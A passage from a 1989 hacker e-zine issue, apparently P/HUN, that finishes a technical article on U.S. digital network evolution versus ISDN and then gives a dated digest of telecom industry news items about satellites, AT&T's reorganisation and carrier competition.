|
|
|||
|
Competition Essentially None Varied, encouraged by
|
|||
|
|
|||
|
government
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Standard Inter- CCITT Essentially none
|
|||
|
|
|||
|
exchange Carriers One, nationalized Many, equal access
|
|||
|
|
|||
|
Existing Investment Due for replacement Huge, undepreciated
|
|||
|
|
|||
|
investment
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Service Offerings By PTT schedule Entrepreneurial, competitive
|
|||
|
|
|||
|
Implementation Cost Government-provided funds Private Capital
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Multiple Carriers and Competative Networks: The premise of ISDN is that a
|
|||
|
|
|||
|
common national network will evolve, able to handle multiple voice and data
|
|||
|
|
|||
|
services in an integrated fashion. ISDN thus precludes a carrier by-passing
|
|||
|
|
|||
|
a local office or vying for customers' traffic through innovative techniques.
|
|||
|
|
|||
|
In most countries other than the U.S., telephone companies are not legally
|
|||
|
|
|||
|
required to provide or counter new service offerings. Integrated digital
|
|||
|
|
|||
|
networks (IDNs) are emerging in the U.S. that provide digital access and
|
|||
|
|
|||
|
transmission, in both circuit-switchhed and packet modes. The number of
|
|||
|
|
|||
|
IDNs will probably increase regardless of whether an ISDN is proposed for
|
|||
|
|
|||
|
the U.S.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Embedded Investment: The U.S. has invested heavily in modern stored-program
|
|||
|
|
|||
|
controlled (SPC) switching. However, other countries are only now facing
|
|||
|
|
|||
|
conversion to SPC, as much of their existing systems investment is
|
|||
|
|
|||
|
greatly depreciated. These countries can therefore converty to ISDN
|
|||
|
|
|||
|
switching in a more orderly and economical fashion that the U.S. can. Thus
|
|||
|
|
|||
|
the U.S. will have overlay networks, digital adjuncts to existing SPC
|
|||
|
|
|||
|
switches, and multiple networks in the foreseeable future.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
EVOLUTION OF U.S. COMMUNICATIONS OFFERINGS
|
|||
|
|
|||
|
------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The American solutions to data transmission problems have tended to be
|
|||
|
|
|||
|
faster, more practical, and less elegant than those evolving in Europe.
|
|||
|
|
|||
|
Not surprisingly, the American solutions have generally ignored CCITT
|
|||
|
|
|||
|
recommendations. For example, public packet-switched networks such as TYMNET,
|
|||
|
|
|||
|
GTE Telenet, and Satellite Business Systems are offered to some customers
|
|||
|
|
|||
|
with long-haul traffic. These systems were severly limited because they
|
|||
|
|
|||
|
often required access through analog local office. Many major industries
|
|||
|
|
|||
|
and private organizations thus established their own data networks, often
|
|||
|
|
|||
|
point to point over leased circuts. Digital Terminating Service was
|
|||
|
|
|||
|
introduced to provide 56K bit-per-second (up to 448K bit-per-second)
|
|||
|
|
|||
|
links to the end user over special transmission links. Digital Electronic
|
|||
|
|
|||
|
Message Service was recently approved to provide 1.5M bit-per-second service
|
|||
|
|
|||
|
to the end user.
|
|||
|
|
|||
|
Some suppliers are now offering PBXs with 64K bit-per-second local loops
|
|||
|
|
|||
|
and direct pulse code-modulated (PCM) trunks to the public network. Two
|
|||
|
|
|||
|
new standard 1.544M bit-per-second central office-to-PBX interfaces have
|
|||
|
|
|||
|
been established, the Northern Telecom Computer-to-PBX-interface and
|
|||
|
|
|||
|
the AT&T Information Systems Digital Multiplexed Interface.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The Development of Local Area Networks: The increasing use of data
|
|||
|
|
|||
|
terminals and the growth of distributed processing has led to the necessity
|
|||
|
|
|||
|
of transporting data at rapid rates within a building or local area.
|
|||
|
|
|||
|
This rapid local data transmission imposed impossible requirements on the
|
|||
|
|
|||
|
conventional PBX. While PBX designers struggled to upgrade their data
|
|||
|
|
|||
|
capabilities, computer manufacturers saw the oppertunity to offer local
|
|||
|
|
|||
|
area networks (LANs) designed specifically to provide wideband data transport
|
|||
|
|
|||
|
between users in a limited area. Again, expediency and the competitive
|
|||
|
|
|||
|
climate produced a practical solution - several LANs with different
|
|||
|
|
|||
|
architectures and protocols. In general, these LANs so not conform to the
|
|||
|
|
|||
|
ISDN protocol levels identified in the International Standards Organization
|
|||
|
|
|||
|
(OSI) models. However these LANs cannot be eadily replaced, so the USDN
|
|||
|
|
|||
|
will have to accommodate them.
|
|||
|
|
|||
|
A case in point is the apparent conflict between the ISO model of Open
|
|||
|
|
|||
|
System Interconnection (OSI) and the IBM System Network Architecture (SNA).
|
|||
|
|
|||
|
The OSI model of a seven-layered architecture for data networks has been
|
|||
|
|
|||
|
defined for the first four layers only. International agreement on the
|
|||
|
|
|||
|
remaining protocols will take several more years to obtain, if agreement on
|
|||
|
|
|||
|
the remaining protocols will take several more years to obtain, if agreement
|
|||
|
|
|||
|
is possible, Meanwhile, in the U.S., IBM defined a similar protocol, SNA,
|
|||
|
|
|||
|
and has implemented numerous networks. Long before any ISO standard can be
|
|||
|
|
|||
|
established, the U.S. will be well populated with SNA systems. The USDN
|
|||
|
|
|||
|
must be at least compatible with SNA, and SNA could become the national
|
|||
|
|
|||
|
standard.
|
|||
|
|
|||
|
Because future PBXs will probably be able to switch synchronous data at
|
|||
|
|
|||
|
64K bits per second (and multiples therof, up to at least 1.544M bits per
|
|||
|
|
|||
|
second), there may not be sufficient switched wideband traffic requirements
|
|||
|
|
|||
|
to support a seperate LAN standard. Long-distance dedicated data services
|
|||
|
|
|||
|
such as AT&T's ACCUNET and SKYNET are competing for data traffic. In
|
|||
|
|
|||
|
addition, various data-over-voice (DOV) schemes have been employed over
|
|||
|
|
|||
|
switched analog circuts. In short, many approaches, services, and facilities
|
|||
|
|
|||
|
have already been implemented to satisfy the immediate market needs, without
|
|||
|
|
|||
|
regard to an orderly transition to ISDN. Thus, the USDN will have to
|
|||
|
|
|||
|
accomodate thesee established services and inteface with most of them.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Introduction of Local Area Data Transports: Recently, electronic (carrier)
|
|||
|
|
|||
|
serving areas have been replacing long local physical loops. These
|
|||
|
|
|||
|
subscriber carrier systems provide such data capabilities as DOV and local
|
|||
|
|
|||
|
area data transport (LADT). LADT offers a packet-switched data capability
|
|||
|
|
|||
|
that may apply to both business and residential services; its low speed
|
|||
|
|
|||
|
(up to 4.8K bits per second) and relatively low cost may make it universally
|
|||
|
|
|||
|
attractive. LADTs may find widespread use for Videotex, meter reading,
|
|||
|
|
|||
|
power load shedding, security reporting, and marketing transactions.
|
|||
|
|
|||
|
Although LADT is restricted primarily to a local exchange area, the
|
|||
|
|
|||
|
evolving USDN will provide transport between LADTs. LADT subscribers will
|
|||
|
|
|||
|
access the USDN transport carrier through pooled local data concentrators.
|
|||
|
|
|||
|
A typical LADT Data Subscriber Interface (DSI) unit will concentrate data
|
|||
|
|
|||
|
from 124 subscribers to a 56K (or 9.6K) bit-per-second trunk to a packet
|
|||
|
|
|||
|
network. A subscriber can thus dial up a DSI over a conventional voice
|
|||
|
|
|||
|
loop and transport data through a modem (which may be a part of the
|
|||
|
|
|||
|
terminal) by means of the switch. A direct access mode is also available
|
|||
|
|
|||
|
with the subscriber loop terminating on the DSI, permitting independant
|
|||
|
|
|||
|
simultaneous data and voice transmission. The X.25 link access protocol-
|
|||
|
|
|||
|
balanced (LAPB) is used, but protocol conversion is restricted in many
|
|||
|
|
|||
|
instances by federal rules. Although LADTs so not comply with any defined
|
|||
|
|
|||
|
ISDN service, they are an integral requirement of the USDN.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CSDC Technology: Circut-switched digital capability (CSDC) is another
|
|||
|
|
|||
|
USDN service that has no ISDN counterpart. CSDC is an alternative voice-
|
|||
|
|
|||
|
or data-switched circut with end-to-end 56K (or 64K) bit-per-second
|
|||
|
|
|||
|
transparent connection ensured by dedicated trunk groups in each
|
|||
|
|
|||
|
switching location. CSDC facilitates large, continuous, bulk data trans-
|
|||
|
|
|||
|
fers, and its implementation requires added investment in each switch
|
|||
|
|
|||
|
location as special terminal equipment. CSDC represents yet another
|
|||
|
|
|||
|
expediant toward providing ISDN-like services while using existing investment.
|
|||
|
|
|||
|
CSDC technology can also accomodate a full ISDN, if one ever evolves in the
|
|||
|
|
|||
|
U.S.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Digital Subscriber Loops: ISDN-compatible digital subscriber loops (two
|
|||
|
|
|||
|
voice, plus one data channel at 144K bits per second) are recieving attention
|
|||
|
|
|||
|
in the U.S., but the commercial implementation of this technology is not
|
|||
|
|
|||
|
prograssing rapidly. Near-term subscriber loops will probably acquire data
|
|||
|
|
|||
|
capability by data ober analog voice multiplexing. Although this step
|
|||
|
|
|||
|
would not precluse the eventual inclusion of ISDN loops, it would tend to
|
|||
|
|
|||
|
slow their introduction and widespread acceptance.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Interfaces and Protocols: Although the ISDN revolves around the 30 channel
|
|||
|
|
|||
|
PCM transmission format used in Europe, it does provide for the 24 channel-
|
|||
|
|
|||
|
based systems used in the U.S. However, U.S. systems have many unique
|
|||
|
|
|||
|
interface requirements. A new set of proposed services will require
|
|||
|
|
|||
|
forwarding of the calling number for control or processing by either the
|
|||
|
|
|||
|
terminating switching system or the called subcriber. Exchange of such
|
|||
|
|
|||
|
information will likely be accomplished over a local area common channel
|
|||
|
|
|||
|
signaling system or a fulll CCITT standard, signaling system #7 network.
|
|||
|
|
|||
|
Direct data exchange between a network switching unit and a sata bank
|
|||
|
|
|||
|
and/or processor facility will probably evolve from the current trunking
|
|||
|
|
|||
|
scheme to a direct signaling carrier, perhaps CCITT standard #7 with OSI
|
|||
|
|
|||
|
and/or SA protocols.
|
|||
|
|
|||
|
Calls to cellular mobile roamers (i.e., mobile units that have traveled
|
|||
|
|
|||
|
outside their base area) will probably be routed to a central data base for
|
|||
|
|
|||
|
locating routes. A personal locator service for automatically routing calls
|
|||
|
|
|||
|
to the unit's temporary location will require unique system interface and
|
|||
|
|
|||
|
protocols. Privately owned transaction networks may provide this unique
|
|||
|
|
|||
|
interface. While the objective is to eventually use CCITT standard #7 as a
|
|||
|
|
|||
|
vehicle and X.25 as an interface protocol, the USDN must embrace a wide
|
|||
|
|
|||
|
assortment of formats, protocols, and interfaces for the near future.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TRANSMISSION TECHNOLOGY TRENDS
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Ultimately, subscriber loops in the U.S. will be digital, providing two
|
|||
|
|
|||
|
64K bit-per-second voice or data channels (i.e.,two B channels) and one 16K
|
|||
|
|
|||
|
bit-per-second voice or data channels (i.e., two B channels) and one 16K
|
|||
|
|
|||
|
bit-per-second data only (i.e., one D channel). The 16K bit-per-second
|
|||
|
|
|||
|
channel will probably permit an 8K bit-per-second user data channel or
|
|||
|
|
|||
|
submultiplexed channels of a lower bit rate. Full-duplex (i.e., four wire)
|
|||
|
|
|||
|
operation will be provided by echo-canceling techniques over existing
|
|||
|
|
|||
|
two-wire loops. An althrnarive approach of time-domain multiplexing may
|
|||
|
|
|||
|
also be used, especially in the neat term.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Local Loops: Although modems will not be required at either end of the
|
|||
|
|
|||
|
local loop, network terminating equipment will be required to serve as the
|
|||
|
|
|||
|
multiplexor and, perhaps, as voice CODECs. Users of such circuts can have
|
|||
|
|
|||
|
full, simultaneous, reall-time voice and data channels, as well as seperate
|
|||
|
|
|||
|
control, metering, and low-speed data transmission. With advanced
|
|||
|
|
|||
|
switching centers, each circut can be routed and billed independently.
|
|||
|
|
|||
|
Existing 56K bit-per-second channels on conventional 24-channel digital
|
|||
|
|
|||
|
carrier systems will be replaced by or supplemented with 64K bit-per-second
|
|||
|
|
|||
|
clear channels with extended framing.
|
|||
|
|
|||
|
The local loop plant in many areas is already migrating toward carrier-
|
|||
|
|
|||
|
serving areas, implemented by a subscriber carrier capable of digital
|
|||
|
|
|||
|
transmission. Some local telephone companies are installing glass fiber in
|
|||
|
|
|||
|
their local plants in preparation for the downward migration of direct
|
|||
|
|
|||
|
digital transmission. However, until full, ISDN-type local loops are
|
|||
|
|
|||
|
universally available, near-term adaptations will be offered to satisfy
|
|||
|
|
|||
|
market needs and to prevent users from seeking other communications
|
|||
|
|
|||
|
facilities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Wideband Circuts: Wideband circuits (i.e., multiples of 64K bits per
|
|||
|
|
|||
|
second) over the public switched network may become feasible as newer
|
|||
|
|
|||
|
switching elements are used. Although some transmission links may soon
|
|||
|
|
|||
|
be able to combine DS-O channels for real-time wideband service, limitations
|
|||
|
|
|||
|
in switching centers will restrict their general use. Seperate wideband
|
|||
|
|
|||
|
switching modules, multiplexing on CATV, or extension of wideband LANs may
|
|||
|
|
|||
|
ultimately appear if the need for wideband transmission remains strong.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Packet Transmission: Packet transmission is an inherent element of the
|
|||
|
|
|||
|
ISDN. However, the USDN must handle separate packet networks, separate
|
|||
|
|
|||
|
facilities, separate routing, and even sCparLte roviders. It is unlikely
|
|||
|
|
|||
|
that American packet networks in the U.S. will ever be combined into an
|
|||
|
|
|||
|
integrated, single-network ISDN. Therefore, the USDN must accommodate such
|
|||
|
|
|||
|
overlay networks and the associated problems of routing, protocol conver-
|
|||
|
|
|||
|
sion, circuit maintenance, billing, and network management. American users
|
|||
|
|
|||
|
will demand and recieve more options for data transport, data processing,
|
|||
|
|
|||
|
and support services than any single network is likely to provide.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SWITCHING TECHNOLOGY TRENDS
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Implementing ISDN standards on the switching systems already in place
|
|||
|
|
|||
|
throughoout the U.S. is a formidable task. Most local end offices have
|
|||
|
|
|||
|
been replaced by SPC analog switches within the past decade. More recently,
|
|||
|
|
|||
|
SPC digital switches have been installed, and this trend will probably
|
|||
|
|
|||
|
accelerate through the 1990s. However, these newer switches are third-
|
|||
|
|
|||
|
generation design; that is, they are designed primarily to handle conventional
|
|||
|
|
|||
|
voice circuit switched traffic within a hierarchical network. These switches
|
|||
|
|
|||
|
are not optimized for data handling, multiple networks, or sophisticated user
|
|||
|
|
|||
|
needs. Although hardware retrofits and software patches are being applied to
|
|||
|
|
|||
|
accommodate LADT, CSDC, and digital loops, such solutions result in limited
|
|||
|
|
|||
|
user services, higher costs, and more complex maintenance requirements.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Fourth-Generation Switching: Fourth-generation switching systems, design-
|
|||
|
|
|||
|
ed for USDN requirements, are beginning to appear. A fourth-generation
|
|||
|
|
|||
|
switch is optimized for data; voice switching is simply a special case of
|
|||
|
|
|||
|
data transmission at speeds of 64K bits per second, 32K bits per second,
|
|||
|
|
|||
|
or any other evolutionary compressed voice bit rate. Fourth-generation
|
|||
|
|
|||
|
switches do not have central processors. Each functional unit (e.g., lines
|
|||
|
|
|||
|
or trunks) contains its own processing hardware and software to output
|
|||
|
|
|||
|
packet-format messages (i.e., containing a header message and a data byte)
|
|||
|
|
|||
|
in a uniform deferred format. (The data byte may be a digitized voice sample.)
|
|||
|
|
|||
|
These packets then are routed through a central matrix, which also contains
|
|||
|
|
|||
|
sufficient processing power to route packets to their interim or final
|
|||
|
|
|||
|
destination with only the data contained in the header bits of the call
|
|||
|
|
|||
|
itself.
|
|||
|
|
|||
|
Services such as route translation, tone reception, billing recording, and
|
|||
|
|
|||
|
termination functions are inserted into a call in progress by routing the
|
|||
|
|
|||
|
call packets to specific functional modules on demand. The modules perform
|
|||
|
|
|||
|
the required call functions and return the packetsto the matrix. (or interal
|
|||
|
|
|||
|
network). When the required call-handling functions have been sequentially
|
|||
|
|
|||
|
accomplished, the call is terminated to the desired port and a virtual
|
|||
|
|
|||
|
circuit is established between the calller and called terminals. During
|
|||
|
|
|||
|
the call, the packet header provides control and supervision and performs
|
|||
|
|
|||
|
routine maintenance and alarms.
|
|||
|
|
|||
|
A fourth-generation switch performs required functions-Centrex attendants,
|
|||
|
|
|||
|
toll operators, common-channel signaling, or LAN termination-when the
|
|||
|
|
|||
|
appropriate module is simply plugged in. These functions do not affect
|
|||
|
|
|||
|
existing system service or capacity. Ideally suited to the USDN, the fully
|
|||
|
|
|||
|
distributed control architecture of a true forth-generation switch
|
|||
|
|
|||
|
could also meet the longer-range objectives of the ISDN.
|
|||
|
|
|||
|
Because they do not require a large, costly central processor complex,
|
|||
|
|
|||
|
fourth-generation switches can be economically applied as add-on units or
|
|||
|
|
|||
|
adjuncts to existing SPC switches. Fourth-generation switches thus provide
|
|||
|
|
|||
|
advanced capabilities without the necessity of replacing or retrofitting
|
|||
|
|
|||
|
the existing switches. Some features that can be provided as adjuncts
|
|||
|
|
|||
|
are described in the following paragraphs.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Special Services: In the U.S., services that require more sophisticated
|
|||
|
|
|||
|
transmission that provided by standard telephone lines are expanding rapidly.
|
|||
|
|
|||
|
By the end of the 1980s, 50 percent of all lines may require some special
|
|||
|
|
|||
|
treatment. A USDN switch, or a special service adjunct can provide univer-
|
|||
|
|
|||
|
sal line circuits that can be remotely administered for transmission
|
|||
|
|
|||
|
balance, type of transmission, routing, and signaling. The special service
|
|||
|
|
|||
|
adjunct can provide various voice and data arrangements and automatic
|
|||
|
|
|||
|
facilities testing as well as provide and maintain sophisticated data and
|
|||
|
|
|||
|
voice services, often without changing the user's original telephone number.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Business Services: Integrated toll, local, Centrex, PBX, and instrument/
|
|||
|
|
|||
|
terminal systems are not provided in the U.S. because of its regulatory
|
|||
|
|
|||
|
climate. Regulations controlling enhanced services, authority to provide
|
|||
|
|
|||
|
services, equal-access provisions, and franchising of special carriers and
|
|||
|
|
|||
|
servers all affect the USDN but are constraints in the ISDN plans. Because
|
|||
|
|
|||
|
of the uncertainty and ambiguity in such regulatory matters, the business
|
|||
|
|
|||
|
services adjunct can be used with less economic risk than replacing or
|
|||
|
|
|||
|
retrofitting existing switching systems would incur. The business services
|
|||
|
|
|||
|
adjunct permits the existing local office to continue providing the local
|
|||
|
|
|||
|
telephone service for which it was optimized. The business services
|
|||
|
|
|||
|
adjunct can also economically provide such features as:
|
|||
|
|
|||
|
* Citywide, Centrex-like service with universal numbering among user
|
|||
|
|
|||
|
locations.
|
|||
|
|
|||
|
* Centralized attendants and night service
|
|||
|
|
|||
|
* Direct data lines at 64K bits per second
|
|||
|
|
|||
|
* Rerouting of existing PBX trunks with improvement in features
|
|||
|
|
|||
|
* Lan termination for PBX-to-Lan connections and LAN-to-LAN bridging.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 10 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
__________________________________
|
|||
|
|
|||
|
| |
|
|||
|
|
|||
|
| P/HUN Telecom News/Advancements |
|
|||
|
|
|||
|
| PART 1 |
|
|||
|
|
|||
|
| By DareDevil |
|
|||
|
|
|||
|
|__________________________________|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Feb. 17-19, 1989
|
|||
|
|
|||
|
SATELLITE USE WILL KEEP SOARING:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Satellites and fiber-optic cables will be used for
|
|||
|
|
|||
|
international communications well into the 21st century, according
|
|||
|
|
|||
|
to a Communications Satellite Corp. study. The study suggests that
|
|||
|
|
|||
|
services using satellite systems could be up to 45% less expensive
|
|||
|
|
|||
|
than international transmissions that use fiber. Also giving
|
|||
|
|
|||
|
satellites staying power: Ability to reach remote areas.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RCI SENDS CALLS OVER THE WATER:
|
|||
|
|
|||
|
RCI Long Distance, a subsidiary of Rochester Telephone, said
|
|||
|
|
|||
|
Thursday that it has added 122 countries to its international
|
|||
|
|
|||
|
service, including popular calling areas such as West Germany and
|
|||
|
|
|||
|
Israel. Rates: RCI says only that the service will be priced
|
|||
|
|
|||
|
competitively with other carriers offering international services.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PROGRAM PUTS NETWORK ON THE MAP:
|
|||
|
|
|||
|
A computer program from Connections Telecommunications can be
|
|||
|
|
|||
|
used by network designers to create a visual map of their
|
|||
|
|
|||
|
wide-area network, reports Computerworld magazine. The program,
|
|||
|
|
|||
|
called Mapconnect, will superimpose over a map of the USA the
|
|||
|
|
|||
|
serving office, hubbing point and area sites with their
|
|||
|
|
|||
|
connections. Cost: $2,000 per copy, plus $400 annual maintenance
|
|||
|
|
|||
|
after the first year.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CALIFORNIA, MORE FIRMS COMPETE:
|
|||
|
|
|||
|
Competition for local access and transport area data
|
|||
|
|
|||
|
transmissions to long distance carriers has been strengthened in
|
|||
|
|
|||
|
California by a recent PUC decision. The commission approved a
|
|||
|
|
|||
|
deregulation plan that will likely have MCI, US Sprint and Cable
|
|||
|
|
|||
|
and Wireless Management Services competing with Pacific Bell and
|
|||
|
|
|||
|
GTE California, says CommunicationsWeek.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VERMONT TO UPGRADE TELE SYSTEM:
|
|||
|
|
|||
|
The State of Vermont will be getting technical support for
|
|||
|
|
|||
|
improvements in its telecommunications network from Federal
|
|||
|
|
|||
|
Engineering Inc., according to CommunicationsWeek. Contract value:
|
|||
|
|
|||
|
Not revealed. Federal Engineering has provided similar service in
|
|||
|
|
|||
|
Montana, New Mexico, North Dakota, Virginia and Wyoming.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CAMPUS GETS BIG DOSE OF HI-TECH:
|
|||
|
|
|||
|
Southwestern Bell is putting more than 40 miles of high-speed
|
|||
|
|
|||
|
fiber optics into the St. Louis Community College system, reports
|
|||
|
|
|||
|
CommunicationsWeek. The network will link the school's 3 campuses
|
|||
|
|
|||
|
and headquarters to provide video, voice and data transmissions
|
|||
|
|
|||
|
for educational programs. Cost to the school: $580,000, plus
|
|||
|
|
|||
|
$2,000 per month to use the system.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SOMEONE MIGHT BE LISTENING:
|
|||
|
|
|||
|
About 30 hours worth of recorded audio-visual material was
|
|||
|
|
|||
|
recorded by New York City residents recently for transmission into
|
|||
|
|
|||
|
outer space, reports InfoText magazine. AT&T set up the free
|
|||
|
|
|||
|
service at its headquarters. Messages were beamed into space on
|
|||
|
|
|||
|
the company's satellite dishes. Among the messages: A young
|
|||
|
|
|||
|
student reported on a pro basketball game for any interested
|
|||
|
|
|||
|
"aliens."
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Feb. 20, 1989
|
|||
|
|
|||
|
AT&T PLANS OVERHAUL:
|
|||
|
|
|||
|
AT&T announced a sweeping overhaul Friday designed to make the
|
|||
|
|
|||
|
long-distance company more competitive and profitable. AT&T will
|
|||
|
|
|||
|
split its 5 business groups into 12 units to 25 units that each
|
|||
|
|
|||
|
will have sole responsibility for a product or service. The idea
|
|||
|
|
|||
|
will be phased in over a period of months this year. (For more,
|
|||
|
|
|||
|
see special AT&T package below. From the USA TODAY Money section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
JAPAN SET FOR JUNGLE LAUNCH:
|
|||
|
|
|||
|
The first of 2 satellites for the Japan Communications
|
|||
|
|
|||
|
Satellite Co. lifts off Feb. 28 from a jungle launch pad in French
|
|||
|
|
|||
|
Guiana. The launch will inaugurate commercial satellite
|
|||
|
|
|||
|
communications in Japan and be the first of Hughes Communications'
|
|||
|
|
|||
|
new HS 393 series. The satellite will begin serving the Japanese
|
|||
|
|
|||
|
islands, including Okinawa, after a 30- to 60-day testing period.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SATELLITE HAS MANY CUSTOMERS:
|
|||
|
|
|||
|
The JCSAT 1 satellite going into orbit on Feb. 28 will provide
|
|||
|
|
|||
|
the Japanese islands with various new services. Scheduled to come
|
|||
|
|
|||
|
off the satellite: Network and cable TV distribution, used-car
|
|||
|
|
|||
|
auctions, prep school classes, religious programming, automobile
|
|||
|
|
|||
|
dealer training, a specialized engineering video network. Also: A
|
|||
|
|
|||
|
business group plans to offer business communications.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BIG SATELLITE WON'T BE THE LAST:
|
|||
|
|
|||
|
With a deployed height of 10 meters, the Hughes Communications'
|
|||
|
|
|||
|
satellite being launched by Japan next week will be the largest
|
|||
|
|
|||
|
Hughes commercial satellite ever launched. It contains 32
|
|||
|
|
|||
|
transponders, each one capable of transmitting one TV channel, 45
|
|||
|
|
|||
|
million bits of data per second, or more than 250 telephone
|
|||
|
|
|||
|
circuits. Japan will launch a second satellite this summer.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SPACE STATION MAKES AUDIO PLANS:
|
|||
|
|
|||
|
NASA has chosen Harris Corp. audio communications systems for
|
|||
|
|
|||
|
use on the space station Freedom, scheduled for operations in
|
|||
|
|
|||
|
1995. CommunicationsWeek says that under a $35 million subcontract
|
|||
|
|
|||
|
with Boeing Aerospace, Harris will design, develop and produce
|
|||
|
|
|||
|
systems for onboard use. Special feature: At times when crew
|
|||
|
|
|||
|
members have their hands busy, a voice recognition capability will
|
|||
|
|
|||
|
be available.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CHINA SPRINTS FOR THE MICROWAVE:
|
|||
|
|
|||
|
About 90% of its surplus microwave network has been sold or
|
|||
|
|
|||
|
dismantled by US Sprint, according to CommunicationsWeek. The old
|
|||
|
|
|||
|
equipment is being replaced by a fiber network. Most recently, the
|
|||
|
|
|||
|
People's Republic of China spent about $15 million for 6,000 used
|
|||
|
|
|||
|
analog microwave radios and 600 parabolic antennas. China plans to
|
|||
|
|
|||
|
use the equipment on 11 existing microwave networks.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NYNEX BEGINS ANOTHER TEST:
|
|||
|
|
|||
|
Nynex is providing a digital data-over-voice private-line
|
|||
|
|
|||
|
access service for Telenet Communications in a New York City field
|
|||
|
|
|||
|
trial. It is one of 35 basic service elements Nynex specified in
|
|||
|
|
|||
|
its Open Network Architecture plan for the FCC, reports
|
|||
|
|
|||
|
CommunicationsWeek. Nynex expects to present 14 other new
|
|||
|
|
|||
|
offerings before the end of the year.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BOSSES GET MORE RESPONSIBILITY:
|
|||
|
|
|||
|
The reorganization plan announced by AT&T Friday is the first
|
|||
|
|
|||
|
major policy move by Robert E. Allen since he took over last April
|
|||
|
|
|||
|
as chairman. The goal: Get managers to focus more on customers and
|
|||
|
|
|||
|
on costs by giving them total responsibility for any money they
|
|||
|
|
|||
|
make or lose. Right now most of that responsibility is held by top
|
|||
|
|
|||
|
managers at AT&T.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
AT&T HOPES FOR BIGGER SALES:
|
|||
|
|
|||
|
The AT&T move to split its business groups comes at an
|
|||
|
|
|||
|
opportune time. AT&T is losing market share in the long-distance
|
|||
|
|
|||
|
phone market to rivals MCI and US Sprint. Also: AT&T's overall
|
|||
|
|
|||
|
sales growth has been modest over the last several years. Under
|
|||
|
|
|||
|
the new plan, the presidents of AT&T's 5 operating groups will be
|
|||
|
|
|||
|
renamed group executives. The new units will operate as
|
|||
|
|
|||
|
independent businesses.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NEW APPROACH MIGHT START SLOWLY:
|
|||
|
|
|||
|
Analysts say it will take years to streamline AT&T's
|
|||
|
|
|||
|
bureaucracy and get managers accustomed to being directly
|
|||
|
|
|||
|
accountable for the performance of their businesses. AT&T reported
|
|||
|
|
|||
|
a loss of $1.67 billion on sales of $35.21 billion in 1988.
|
|||
|
|
|||
|
Earnings were reduced by a net charge of $3.94 billion from
|
|||
|
|
|||
|
writing off old equipment and accelerating modernization of its
|
|||
|
|
|||
|
long-distance network.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Feb. 21, 1989
|
|||
|
|
|||
|
DATA CROSSES MILES WITH SPEED:
|
|||
|
|
|||
|
Northern Telecom yesterday announced the availability of the
|
|||
|
|
|||
|
High Speed Data Module, a data connectivity device that is an
|
|||
|
|
|||
|
addition to the Meridian SL-1 Data Services product line. A
|
|||
|
|
|||
|
typical application might involve a bank that uses the module to
|
|||
|
|
|||
|
connect a programming facility with the bank's main data center,
|
|||
|
|
|||
|
located approximately 400 miles away. Cost: $725.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
INMATES TOUCH, SAVE AND LOSE:
|
|||
|
|
|||
|
Some 15 inmates from local prisons in the Nashville, Tenn.,
|
|||
|
|
|||
|
area face computer fraud charges after figuring out Touch & Save
|
|||
|
|
|||
|
long-distance phone customers' user codes. Officials say the
|
|||
|
|
|||
|
inmates charged more than $2,000 in calls. The inmates gained
|
|||
|
|
|||
|
access to the codes and sold them for $5 or more to others in the
|
|||
|
|
|||
|
prison. (From the USA TODAY News section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PRODUCTS WILL PROTECT DATA:
|
|||
|
|
|||
|
CompuServe Inc. has introduced new encryption products for its
|
|||
|
|
|||
|
public packet data network, Network World reports. The encryption
|
|||
|
|
|||
|
services let users move data from expensive leased lines to
|
|||
|
|
|||
|
cost-effective dial-up public circuits, while protecting the data
|
|||
|
|
|||
|
from unauthorized access. The cost ranges from $1,495 to $8,100.
|
|||
|
|
